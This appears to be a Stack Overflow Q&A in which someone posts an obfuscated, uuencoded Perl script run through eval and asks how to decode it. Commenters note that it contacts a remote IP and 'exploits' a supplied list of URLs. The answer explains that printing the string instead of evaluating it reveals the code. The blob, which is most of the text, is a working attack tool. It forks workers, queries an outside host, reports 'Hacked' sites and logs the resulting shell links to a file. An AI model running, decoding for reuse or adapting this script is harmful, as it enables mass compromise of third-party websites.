# I found this code and I think it's encoded. I tried to understand how it's encoded or how can read it. Does anyone have an idea to decode this code?

Tags: perl

I found this code and I think it's encoded. I tried to understand how it's encoded or how I can read it.

```
eval unpack u=>q{_(W5S92!W87)N:6YG<SL*=7-E($Q74#HZ57-E<D%G96YT.PHC=7-E($Q74#HZ4')O=&]C;VPZ.FAT='!S.PHC_=7-E($YE=#HZ4U-,.PIM>2`D57-E<B`]("1!4D=66S!=.PIM>2`D;6%X7W!R;V-E<W-E<R`]("1!4D=66S%=_.PIM>2!`<&ED<SL*;7D@)&YP:61S/3`["B!O<&5N*"!54T524RP@(")<>#-#)%5S97(B*2!\?"!D:64@(EQX_,C!<>#0S7'@V,5QX-D5<>#9%7'@V1EQX-S1<>#(P7'@V1EQX-S!<>#8U7'@V15QX,C!<>#<T7'@V.%QX-C5<_>#(P7'@R,%QX-S=<>#9&7'@W,EQX-C1<>#(P7'@V-EQX-CE<>#9#7'@V-5QX,C!<>#-!7'@R,"1B<G5T97EF_:6QE7'@R,%QX,C%<>#(P7&XB.PH@("`@("`@(&-H;VUP*$!B<G5T969I;&4Q(#T@/%5315)3/BD["F-L;W-E_*%5315)3*3L*("`@("`@("!F;W)E86-H("1/4#$@*$!B<G5T969I;&4Q*0H@("`@("`@('L*"B`@("`@("`@_;7D@)'!I9#L*("`@("`@("`D<&ED/69O<FLH*3L*("`@("`@("!I9B@D<&ED/C`I>PH@("`@("`@("`@("`@_("`@)&YP:61S*RL["B`@("`@("`@("`@("`@("`C<')I;G0@(B!0<F]C97-S97,@87)E.B`D;G!I9'-<;B(@_.PH@("`@("`@("`@("`@("`@:68H)&YP:61S/CTD;6%X7W!R;V-E<W-E<RE["B`@("`@("`@("`@("`@("`@_("`@("`@(&9O<B@Q+BXH)&UA>%]P<F]C97-S97,I*7L*("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@_("!M>2`D=V%I=%]R970]=V%I="@I.PH@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@(&EF*"1W86ET_7W)E=#XP*7L*("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("1N<&ED<RTM.PH@("`@_("`@("`@("`@("`@("`@("`@("`@("`@("`@('T*("`@("`@("`@("`@("`@("`@("`@("`@?0H@("`@("`@_("`@("`@("`@?0H@("`@("`@("`@("`@("`@;F5X=#L*("`@("`@("!]96QS:68H=6YD968@)'!I9"E["B`@_("`@("`@("`@("`@("!P<FEN="`B7'@R,%QX-#9<>#9&7'@W,EQX-D)<>#(P7'@V-5QX-S)<>#<R7'@V1EQX_-S)<>#(Q7&XB.PH@("`@("`@("`@("`@("`@97AI="@P*3L*("`@("`@("!]96QS97L*("`@("`@("`@("`@_("`@(&QO8V%L("1324=[(EQX-#%<>#1#7'@U,EQX-$0B?2`]('-U8B![(&5X:70H,"D[('T["B`@("`@("`@_("`@("`@("!A;&%R;2`P.PH*("`@("`@("!E=F%L('L*("`@("`@("`@("`@("`@('!R:6YT(")<>#0U7'@W_.%QX-S!<>#9#7'@V1EQX-CE<>#<T7'@V.5QX-D5<>#8W7'@R,"1/4#%<<EQN(CL*("`@("`@("`@("`@("`@_(&5L82@D3U`Q*3L*("`@("`@("!].PH*"B`@("`@("`@("`@("`@("!E>&ET*#`I.PH@("`@("`@('T*?0H*_9F]R*#$N+B1N<&ED<RE["B`@("`@("`@;7D@)'=T/7=A:70H*3L*("`@("`@("!I9B@D=W0]/2TQ*7L*("`@_("`@("`@("`@("`@('!R:6YT(")<>#(P7'@V.5QX-S-<>#(P7'@R,"0A7&XB.PH@("`@("`@("`@("`@("`@_<F5D;SL*("`@("`@("!]"GT*<W5B(&5L82!["FUY($!C:&%R<R`]("@B7'@T,2(N+B)<>#5!(BP@(EQX-C$B_+BXB7'@W02(L("(P(BXN(EQX,SDB*3L*;7D@)'-T<FEN9SL*)'-T<FEN9R`N/2`D8VAA<G-;<F%N9"!`8VAA_<G-=(&9O<B`Q+BXQ,#L*(W!R:6YT("(D<W1R:6YG7&XB.PH@;7D@)$]0,2`]<VAI9G0["FUY("1F=6QL(#T@_(EQX,T9<>#<S7'@W.5QX,T0D3U`Q7'@R-EQX-D5<>#8Q7'@S1"1S=')I;F<B.PH@;7D@)'5R;"`](")<>#8X_7'@W-%QX-S1<>#<P7'@S05QX,D9<>#)&7'@S.%QX,SE<>#)%7'@S,EQX,S1<>#,X7'@R15QX,S%<>#,W7'@S_,5QX,D5<>#,Q7'@S,UQX,SA<>#)&7'@W-EQX,D5<>#<P7'@V.%QX-S`B.PIM>2`D8G)O=W-E<B`]($Q74#HZ_57-E<D%G96YT+3YN97<H<W-L7V]P=',@/3X@>R!V97)I9GE?:&]S=&YA;64@/3X@,"!]+"D["B1B<F]W<V5R_+3YT:6UE;W5T*#,P*3L*"FUY("1R97-P;VYS92`]("1B<F]W<V5R+3YG970H(B1U<FPD9G5L;"(I.PIM>2`D_:&5A9"`]("1R97-P;VYS92T^87-?<W1R:6YG*"D["FEF*"1H96%D(#U^(&TO*"XJ*4-O;G1E;G0M3&5N9W1H_.B`U,C8H+BHI+VDI('L*;7D@)&QI;FL@/2`B)$]0,5QX,D8D<W1R:6YG7'@R15QX-S!<>#8X7'@W,"(["G!R_:6YT(")<>#0X7'@V,5QX-C-<>#9"7'@V-5QX-C1<>#(P)&QI;FM<;B(["F]P96XH3U544%54+")<>#-%7'@S_15QX-S-<>#8X7'@V-5QX-D-<>#9#7'@R15QX-S1<>#<X7'@W-"(I.PIP<FEN="!/5510550@(B1L:6YK7')<H;B(["F-L;W-E("A/5510550I.PH*?0IE;'-E>PIE>&ET.PH@?0H@?0}
```

How could I decode this code?

Comment: Where did you find this? The code makes a number of requests to `http://89.248.171.138/v.php`, an [IP apparently associated with spammers](https://www.google.com/?gws_rd=ssl#q=89.248.171.138). You have to pass a list of URLs to "exploit" as one of the parameters to the script, so I'm guessing you're not using this for benign purposes.

Comment: so >> How could I decode this code?

Comment: I'll be the third person to say this, but read ikegami's answer. He explains how in the last sentence.

Comment: @user4964942 Do you know anything at all about Perl?

Comment: A little bit @Matt Jacob

Comment: @user4964942 Ok, so what part of the [answer](http://stackoverflow.com/a/34994820/82262) don't you understand?

Answer (score 3):

Its's a string literal that builds a string. The string is passed to a function of `unpack` that decodes uuencoded strings, so it's presumable a uuencoded string. The decoded string is then passed to `eval`. To see the decoded string, pass it to `print` instead of `eval`.

Comment: "Why don't you pass it to print instead..."

Comment: @ikegami My guess would be that the OP wasn't happy about having to do a very minimal amount of work on his own.